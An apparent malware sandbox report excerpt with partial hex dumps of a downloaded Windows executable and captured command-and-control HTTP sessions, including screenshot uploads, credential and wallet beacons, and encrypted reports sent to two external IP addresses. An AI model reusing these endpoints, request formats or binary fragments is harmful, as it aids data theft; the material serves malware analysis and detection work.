                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 f9 ef 50 8c 98 81 03 8c 98 81 03 8c 98 81 03 98 f3 82 02 86 98 81 03 98 f3 84 02 05 98 81 03 98 f3 85 02 9e 98 81 03 de ed 85 02 83 98 81 03 de ed 82 02 9d 98 81 03 de ed 84 02 ad 98 81 03 98 f3 80 02 8b 98 81 03 8c 98 80 03 ed 98 81 03 40 ed 88 02 8f 98 81 03 40 ed 81 02 8d 98 81 03 40 ed 7e 03 8d 98 81 03 40 ed 83 02 8d 98 81 03 52 69 63 68 8c 98 81 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 84 96 5a 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 1d 00 44 01 00 00 b4 00 00 00 00 00 00 62 70 00 00 00 10 00 00 00 60 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$P@@@~@RichPELZg!Dbp`0@P8@`L.textCD `.rdata*u`vH@@.data@.rsrc@@.reloc@B
                                                                                                                                                                Dec 13, 2024 01:37:36.578989983 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 20 68 98 ae 01 10 b9 60 e8 01 10 e8 7f 4d 00 00 68 70 29 01
                                                                                                                                                                Data Ascii: j h`Mhp)ZYj hx_Mh)ZYjh?Mh0*ZYj hMh*ZYjhLh*jZYjh
                                                                                                                                                                Dec 13, 2024 01:37:36.579004049 CET1236INData Raw: 24 af 01 10 b9 d8 e8 01 10 e8 df 4c 00 00 68 50 2b 01 10 e8 4a 5a 00 00 59 c3 cc cc cc 6a 14 68 44 af 01 10 b9 f0 e8 01 10 e8 bf 4c 00 00 68 b0 2b 01 10 e8 2a 5a 00 00 59 c3 cc cc cc 6a 20 68 5c af 01 10 b9 08 e9 01 10 e8 9f 4c 00 00 68 10 2c 01
                                                                                                                                                                Data Ascii: $LhP+JZYjhDLh+*ZYj h\Lh,ZYjh} Lhp,YYjh}8_Lh,YYjhP?Lh0-YYjhhLh-YYjhKh-
                                                                                                                                                                Dec 13, 2024 01:37:36.579209089 CET1236INData Raw: 8a 55 00 00 59 c3 cc cc cc 6a 00 68 7d af 01 10 b9 80 ec 01 10 e8 ff 47 00 00 68 f0 39 01 10 e8 6a 55 00 00 59 c3 cc cc cc 6a 0c 68 e0 b2 01 10 b9 98 ec 01 10 e8 df 47 00 00 68 50 3a 01 10 e8 4a 55 00 00 59 c3 cc cc cc 6a 14 68 f0 b2 01 10 b9 b0
                                                                                                                                                                Data Ascii: UYjh}Gh9jUYjhGhP:JUYjhGh:*UYjhGh;UYjhGhp;TYjLhX_Gh;TYjh?Gh0<TYjdh(
                                                                                                                                                                Dec 13, 2024 01:37:36.579224110 CET1236INData Raw: 10 e8 3f 43 00 00 68 30 48 01 10 e8 aa 50 00 00 59 c3 cc cc cc 6a 0c 68 0c b7 01 10 b9 28 f0 01 10 e8 1f 43 00 00 68 90 48 01 10 e8 8a 50 00 00 59 c3 cc cc cc 6a 34 68 1c b7 01 10 b9 40 f0 01 10 e8 ff 42 00 00 68 f0 48 01 10 e8 6a 50 00 00 59 c3
                                                                                                                                                                Data Ascii: ?Ch0HPYjh(ChHPYj4h@BhHjPYj(hTXBhPIJPYjhpBhI*PYj<hBhJPYj0hBhpJOYjh_BhJOY
                                                                                                                                                                Dec 13, 2024 01:37:36.579238892 CET672INData Raw: 05 00 00 83 7d 30 00 0f 84 02 05 00 00 83 7d 48 00 0f 84 f8 04 00 00 c7 85 d8 fb ff ff 00 00 00 00 c7 85 e8 fb ff ff 00 00 00 00 c7 85 ec fb ff ff 0f 00 00 00 c6 85 d8 fb ff ff 00 c6 45 fc 03 8d 8d c0 fb ff ff 6a 2f c7 85 c0 fb ff ff 00 00 00 00
                                                                                                                                                                Data Ascii: }0}HEj/h$=jjjjhTE0a}jjjjjECEjPPQ4a}4jjjjjE CE PhXQ8a}LM8uHCM8
                                                                                                                                                                Dec 13, 2024 01:37:36.579344988 CET1236INData Raw: 83 c1 23 2b c7 83 c0 fc 83 f8 1f 0f 87 1f 03 00 00 51 57 e8 c8 45 00 00 83 c4 08 c6 45 fc 04 8b 95 8c fb ff ff 83 fa 10 72 2f 8b 8d 78 fb ff ff 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 e1 02 00 00 52 51 e8
                                                                                                                                                                Data Ascii: #+QWEEr/xBrI#+RQE=PhPV@aV5DaGG~f
                                                                                                                                                                Dec 13, 2024 01:37:36.579360962 CET1236INData Raw: 23 2b c1 83 c0 fc 83 f8 1f 77 7a 52 51 e8 fa 40 00 00 83 c4 08 c7 45 fc ff ff ff ff 8b 55 e0 c7 45 c4 00 00 00 00 c7 45 c8 0f 00 00 00 c6 45 b4 00 83 fa 10 72 28 8b 4d cc 42 8b c1 81 fa 00 10 00 00 72 10 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f
                                                                                                                                                                Data Ascii: #+wzRQ@EUEEEr(MBrI#+w1RQ@tuSMdY_^M3}@]rUjh#dPH3EVWPEd}}EGGEE}4
                                                                                                                                                                Dec 13, 2024 01:37:36.579477072 CET1236INData Raw: 00 8d 4d e0 83 c4 04 8d b7 00 04 00 00 89 75 ec 3b 01 75 12 68 00 04 00 00 6a 00 57 e8 e8 51 00 00 83 c4 0c eb 0a b9 00 01 00 00 83 c8 ff f3 ab 89 75 e8 c7 45 fc 01 00 00 00 33 d2 0f be 8a 60 ba 01 10 8b 45 e4 89 14 88 42 83 fa 40 7c ed 8b 45 d4
                                                                                                                                                                Data Ascii: Mu;uhjWQuE3`EB@|E3M3U~9Pv}DxErEt\xFKU;Ks{ACrDuEuQ4MUEBU;Prt,U+
                                                                                                                                                                Dec 13, 2024 01:37:36.579493999 CET1236INData Raw: 00 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 89 4d cc c6 06 00 bb 01 00 00 00 33 ff 89 5d d0 85 c9 0f 8e e7 00 00 00 c7 45 d4 00 00 00 00 c7 45 e4 00 00 00 00 c7 45 e8 0f 00 00 00 c6 45 d4 00 3b c7 0f 82 14 01 00 00 2b c7 b9 02 00 00 00 3b c1 0f
                                                                                                                                                                Data Ascii: FFM3]EEEE;+;B}ECEQMP,]EE}jCEjPmNV];sAFrDuEuQ/EUr(MBrI#+wpRQ
                                                                                                                                                                Dec 13, 2024 01:37:36.698633909 CET1236INData Raw: f8 1f 77 1e 52 51 e8 85 32 00 00 83 c4 08 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c3 e8 a6 64 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 f5 25 01 10 64 a1 00 00 00 00 50 83 ec 3c a1 08 e0 01 10 33 c5 89 45 f0 56 57 50
                                                                                                                                                                Data Ascii: wRQ2MdY_^[]dUjh%dP<3EVWPEdEMj$EhEEE'EEu33fffEEEE;u+;B}ECEQMP'


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                22192.168.2.549773185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:35.588182926 CET158OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 73 74 3d 73
                                                                                                                                                                Data Ascii: st=s
                                                                                                                                                                Dec 13, 2024 01:37:36.914177895 CET205INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:36 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 8
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 33 3c 64 3e
                                                                                                                                                                Data Ascii: <c>3<d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                23192.168.2.549775185.81.68.147803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:35.781919003 CET170OUTPOST /7vhfjke3/index.php?scr=1 HTTP/1.1
                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ODU4NzA=
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 86022
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Dec 13, 2024 01:37:35.781959057 CET132OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 44 55 34 4e 7a 41 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                                                                                                                Data Ascii: ------ODU4NzA=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
                                                                                                                                                                Dec 13, 2024 01:37:35.782016993 CET6OUTData Raw: ff d8 ff e0
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Dec 13, 2024 01:37:35.782016993 CET6OUTData Raw: 00 10 4a 46
                                                                                                                                                                Data Ascii: JF
                                                                                                                                                                Dec 13, 2024 01:37:35.782051086 CET6OUTData Raw: 49 46 00 01
                                                                                                                                                                Data Ascii: IF
                                                                                                                                                                Dec 13, 2024 01:37:35.782084942 CET6OUTData Raw: 01 01 00 60
                                                                                                                                                                Data Ascii: `
                                                                                                                                                                Dec 13, 2024 01:37:35.782085896 CET6OUTData Raw: 00 60 00 00
                                                                                                                                                                Data Ascii: `
                                                                                                                                                                Dec 13, 2024 01:37:35.782123089 CET6OUTData Raw: ff db 00 43
                                                                                                                                                                Data Ascii: C
                                                                                                                                                                Dec 13, 2024 01:37:35.782123089 CET6OUTData Raw: 00 08 06 06
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Dec 13, 2024 01:37:35.782157898 CET6OUTData Raw: 07 06 05 08
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Dec 13, 2024 01:37:35.782191038 CET6OUTData Raw: 07 07 07 09
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Dec 13, 2024 01:37:37.634553909 CET198INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:36 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 1
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                24192.168.2.549780185.81.68.148806664C:\Windows\System32\rundll32.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:36.224050999 CET176OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 21
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                                                                                                Data Ascii: id=246122658369&cred=
                                                                                                                                                                Dec 13, 2024 01:37:37.538552999 CET198INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:36 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 1
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                25192.168.2.549781185.81.68.148802164C:\Windows\System32\rundll32.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:36.352488995 CET176OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 21
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                                                                                                Data Ascii: id=246122658369&cred=
                                                                                                                                                                Dec 13, 2024 01:37:37.687397957 CET198INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:37 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 1
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                26192.168.2.549782185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:36.893455982 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:37.013684988 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:38.488281012 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:37 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                27192.168.2.549783185.81.68.147803876C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:37.792069912 CET156OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 5
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 77 6c 74 3d 31
                                                                                                                                                                Data Ascii: wlt=1
                                                                                                                                                                Dec 13, 2024 01:37:39.178134918 CET711INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:38 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 512
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
                                                                                                                                                                Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                28192.168.2.549787185.81.68.147801248C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:38.144619942 CET156OUTPOST /7vhfjke3/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Content-Length: 5
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 77 6c 74 3d 31
                                                                                                                                                                Data Ascii: wlt=1
                                                                                                                                                                Dec 13, 2024 01:37:39.459280014 CET711INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:38 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 512
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 2b 2b 2b 5f 31 5f 64 61 38 30 66 39 36 39 30 35 37 32 65 31 39 38 36 31 38 62 31 39 62 61 33 64 32 34 61 64 64 37 63 39 36 61 66 39 65 62 38 35 65 32 38 35 37 35 62 62 65 39 65 64 64 35 63 62 64 33 63 64 61 32 64 66 33 36 2d 31 2d 5f 32 5f 64 62 63 63 63 65 36 31 35 62 37 61 66 35 66 62 35 63 38 66 37 33 63 65 36 61 37 30 39 39 61 65 39 34 36 39 39 64 61 34 64 37 62 30 63 30 33 36 61 66 61 61 62 63 64 65 61 62 38 30 38 38 65 36 62 39 37 37 33 34 64 38 62 33 35 62 33 63 64 30 39 31 38 65 2d 32 2d 5f 33 5f 61 37 65 35 39 35 32 31 30 35 35 64 65 39 62 38 34 38 63 65 30 31 62 65 36 32 37 61 39 61 65 38 64 38 31 66 65 34 63 36 64 33 66 64 62 35 36 63 61 39 65 65 63 66 62 36 64 63 63 33 65 33 38 35 64 64 30 39 2d 33 2d 5f 34 5f 61 66 65 31 39 34 33 33 30 63 35 63 63 39 38 66 34 30 64 35 37 39 39 66 33 36 32 30 61 33 64 62 65 30 33 37 63 31 65 32 66 62 63 33 39 35 34 31 38 63 64 63 63 32 38 31 65 66 66 35 63 30 39 64 63 64 37 30 2d 34 2d 5f 35 5f 64 66 38 64 64 64 32 35 31 36 36 61 65 36 62 63 36 38 38 [TRUNCATED]
                                                                                                                                                                Data Ascii: +++_1_da80f9690572e198618b19ba3d24add7c96af9eb85e28575bbe9edd5cbd3cda2df36-1-_2_dbccce615b7af5fb5c8f73ce6a7099ae94699da4d7b0c036afaabcdeab8088e6b97734d8b35b3cd0918e-2-_3_a7e59521055de9b848ce01be627a9ae8d81fe4c6d3fdb56ca9eecfb6dcc3e385dd09-3-_4_afe194330c5cc98f40d5799f3620a3dbe037c1e2fbc395418cdcc281eff5c09dcd70-4-_5_df8ddd25166ae6bc688801a7046689e6fa0b90f1f4e4b67eb3ace0a4ef85f9e2ea2357a0a87c29b3cdfeb021529870fbff2545a5ed8b81c585c8bc733bec2141b47a9370c65b5e2cb9c202ac4b1ae864feec8d47224f0cce61822e259c2411-5-


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                29192.168.2.549790185.81.68.147801028C:\Windows\explorer.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:38.886986971 CET278OUTPOST /VzCAHn.php?1DC30FADAFF92643095942 HTTP/1.1
                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-type: text/html
                                                                                                                                                                Connection: close
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                Content-Length: 4
                                                                                                                                                                Dec 13, 2024 01:37:39.006882906 CET6OUTData Raw: 48 5e 08 51
                                                                                                                                                                Data Ascii: H^Q
                                                                                                                                                                Dec 13, 2024 01:37:40.328447104 CET216INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:39 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Connection: close
                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                30192.168.2.549791185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:39.013227940 CET312OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 156
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 72 3d 38 32 44 30 39 36 36 33 35 41 32 39 41 31 46 41 30 41 38 39 37 46 43 35 36 30 32 35 43 32 45 39 44 45 36 34 39 44 42 43 38 37 42 39 38 32 36 33 46 30 41 42 45 43 44 35 46 41 44 34 38 43 42 45 46 43 37 46 33 33 38 39 42 42 30 35 36 39 38 30 44 32 38 37 42 38 32 32 37 41 39 33 32 42 39 42 41 30 34 33 30 46 43 36 46 33 38 45 46 46 39 44 42 38 46 37 38 32 35 39 33 46 42 43 31 38 32 32 38 32 34 42 45 31 30 44 42 36 34 34 34 43 37 38 45 41 45 38 33 43 43 33 33 42
                                                                                                                                                                Data Ascii: r=82D096635A29A1FA0A897FC56025C2E9DE649DBC87B98263F0ABECD5FAD48CBEFC7F3389BB056980D287B8227A932B9BA0430FC6F38EFF9DB8F782593FBC1822824BE10DB6444C78EAE83CC33B
                                                                                                                                                                Dec 13, 2024 01:37:40.305244923 CET204INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:39 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 7
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20 3c 63 3e 3c 64 3e
                                                                                                                                                                Data Ascii: <c><d>


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                31192.168.2.549792185.81.68.148803408C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:39.269634962 CET173OUTPOST /8Fvu5jh4DbS/index.php?scr=1 HTTP/1.1
                                                                                                                                                                Content-Type: multipart/form-data; boundary=----ODU4NzA=
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 86022
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Dec 13, 2024 01:37:39.269685030 CET132OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 44 55 34 4e 7a 41 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                                                                                                                Data Ascii: ------ODU4NzA=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
                                                                                                                                                                Dec 13, 2024 01:37:39.269910097 CET6OUTData Raw: ff d8 ff e0
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Dec 13, 2024 01:37:39.269937992 CET6OUTData Raw: 00 10 4a 46
                                                                                                                                                                Data Ascii: JF
                                                                                                                                                                Dec 13, 2024 01:37:39.269967079 CET6OUTData Raw: 49 46 00 01
                                                                                                                                                                Data Ascii: IF
                                                                                                                                                                Dec 13, 2024 01:37:39.270059109 CET6OUTData Raw: 01 01 00 60
                                                                                                                                                                Data Ascii: `
                                                                                                                                                                Dec 13, 2024 01:37:39.270087957 CET6OUTData Raw: 00 60 00 00
                                                                                                                                                                Data Ascii: `
                                                                                                                                                                Dec 13, 2024 01:37:39.270102978 CET6OUTData Raw: ff db 00 43
                                                                                                                                                                Data Ascii: C
                                                                                                                                                                Dec 13, 2024 01:37:39.270128965 CET6OUTData Raw: 00 08 06 06
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Dec 13, 2024 01:37:39.270229101 CET6OUTData Raw: 07 06 05 08
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Dec 13, 2024 01:37:39.270229101 CET6OUTData Raw: 07 07 07 09
                                                                                                                                                                Data Ascii:
                                                                                                                                                                Dec 13, 2024 01:37:41.169337988 CET198INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:39 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 1
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Data Raw: 20
                                                                                                                                                                Data Ascii:


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                32192.168.2.549793185.81.68.148803876C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                Dec 13, 2024 01:37:39.311080933 CET159OUTPOST /8Fvu5jh4DbS/index.php HTTP/1.1
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Host: 185.81.68.148
                                                                                                                                                                Content-Length: 5
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Data Raw: 77 6c 74 3d 31
                                                                                                                                                                Data Ascii: wlt=1
                                                                                                                                                                Dec 13, 2024 01:37:40.683676958 CET711INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 13 Dec 2024 08:37:39 GMT
                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                Content-Length: 512
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
